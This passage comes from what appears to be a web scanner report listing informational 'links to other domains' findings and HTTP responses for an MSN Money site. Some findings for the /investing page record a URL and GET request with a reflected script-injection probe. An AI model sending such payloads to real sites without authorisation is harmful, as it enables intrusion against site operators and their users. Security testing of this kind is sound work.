The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://datalossdb.org/
http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker
http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car
http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car
http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service
http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=does+credit+counseling+work&form=money3
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410164&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.194. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://datalossdb.org/
http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker
http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car
http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car
http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service
http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=does+credit+counseling+work&form=money3
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406263&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a81edef2bc9d42f88e3f3fcae53eb821; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:02 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406263&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Please tell us what you think</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.195. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://datalossdb.org/
http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker
http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car
http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car
http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service
http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=does+credit+counseling+work&form=money3
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344884&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=f60556dbeea04a45aeff6a725b46a741; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344884&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Please tell us what you think</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.196. http://money.redacted/investing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.briefing.com/
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408772&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&resize=false

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

22.197. http://money.redacted/investing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&form=pt10
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.briefing.com/
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296350842&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&resize=false

Request

Response

22.198. http://money.redacted/investing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
